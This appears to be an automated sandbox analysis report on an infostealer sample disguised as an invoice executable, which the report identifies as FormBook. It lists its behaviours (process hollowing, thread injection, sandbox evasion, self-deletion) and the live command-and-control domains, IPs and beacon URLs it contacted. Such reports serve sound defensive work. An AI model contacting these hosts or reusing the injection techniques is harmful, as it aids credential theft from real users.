          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502233 Sample: EXPORT INVOICE 2021.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 31 www.zoipartner.com 2->31 33 www.sosibibyslot.space 2->33 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 6 other signatures 2->47 11 EXPORT INVOICE 2021.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...XPORT INVOICE 2021.exe.log, ASCII 11->29 dropped 59 Injects a PE file into a foreign processes 11->59 15 EXPORT INVOICE 2021.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 35 ratqueen.art 51.161.86.13, 49778, 80 OVHFR Canada 18->35 37 www.piedmontpines.school 209.17.116.165, 49780, 80 DEFENSE-NETUS United States 18->37 39 3 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 cmstp.exe 18->22         started        signatures11 process12 signatures13 51 Self deletion via cmd delete 22->51 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          EXPORT INVOICE 2021.exe33%VirustotalBrowse
          EXPORT INVOICE 2021.exe17%MetadefenderBrowse
          EXPORT INVOICE 2021.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.EXPORT INVOICE 2021.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.vulcanopresale.icu/mqi9/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.ratqueen.art/mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa0%Avira URL Cloudsafe
          http://www.piedmontpines.school/mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ratqueen.art
          		51.161.86.13
          		truetrue
            		unknown
            www.piedmontpines.school
            		209.17.116.165
            		truetrue
              		unknown
              www.kalitelihavaperdesi.com
              		unknown
              		unknowntrue
                		unknown
                www.sosibibyslot.space
                		unknown
                		unknowntrue
                  		unknown
                  www.zoipartner.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.ratqueen.art
                    		unknown
                    		unknowntrue
                      		unknown
                      www.yuezhong66.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        www.vulcanopresale.icu/mqi9/true
                        • Avira URL Cloud: safe
                        		low
                        http://www.ratqueen.art/mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLatrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.piedmontpines.school/mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBwtrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.founder.com.cn/cnEXPORT INVOICE 2021.exe, 00000000.00000003.677421719.000000000155D000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        51.161.86.13
                        		ratqueen.artCanada
                        		16276OVHFRtrue
                        209.17.116.165
                        		www.piedmontpines.schoolUnited States
                        		55002DEFENSE-NETUStrue

                        General Information

                        Joe Sandbox Version:33.0.0 White Diamond
                        Analysis ID:502233
                        Start date:13.10.2021
                        Start time:18:20:09
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 9m 48s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:EXPORT INVOICE 2021.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:14
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@7/1@10/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 26% (good quality ratio 22.8%)
                        • Quality average: 71.1%
                        • Quality standard deviation: 33.5%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 54
                        • Number of non-executed functions: 111
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 40.91.76.224, 131.253.33.200, 13.107.22.200, 20.82.209.183, 95.100.218.79, 93.184.221.240, 20.82.210.154, 2.20.178.33, 2.20.178.24
                        • Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, wu.ec.azureedge.net, wu-shim.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, validation-v2.sls.microsoft.com, arc.msn.com, wu.azureedge.net, dual-a-0001.dc-msedge.net, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, validation-v2.sls.trafficmanager.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        18:21:35API Interceptor1x Sleep call for process: EXPORT INVOICE 2021.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        51.161.86.13b5WjxiOqab.exeGet hashmaliciousBrowse
                        • www.scottgesslerdesign.com/jzvu/?9rq=mRzEKZUdaNl7ltH3Zt23PFVFKBVOmJl5lI4ImGRT+4jF8hnHGhoZT0nVqsAmeIAJc4K10Wg3ow==&4h=vZR8NxdxOD6xzn

                        Domains

                        No context

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        OVHFRSecuriteInfo.com.Heur.573.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.21879.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.573.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.16533.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.18564.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.16533.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.18564.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.10164.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.19388.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.10164.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        SecuriteInfo.com.Heur.19388.xlsGet hashmaliciousBrowse
                        • 188.165.62.61
                        Sales_Receipt 6310.xlsGet hashmaliciousBrowse
                        • 51.83.3.52
                        Purchase_Order 2586.xlsGet hashmaliciousBrowse
                        • 51.83.3.52
                        D9MmQDM0jJ.dllGet hashmaliciousBrowse
                        • 51.83.3.52
                        A76JJinZL9.dllGet hashmaliciousBrowse
                        • 51.83.3.52
                        8QijkUFTSB.dllGet hashmaliciousBrowse
                        • 51.83.3.52
                        HsGBdHtLk2.dllGet hashmaliciousBrowse
                        • 51.83.3.52
                        lPzE2YbyzV.dllGet hashmaliciousBrowse
                        • 51.83.3.52
                        enVuNPtSQE.dllGet hashmaliciousBrowse
                        • 51.83.3.52
                        REQUIREMENT.exeGet hashmaliciousBrowse
                        • 51.77.52.109
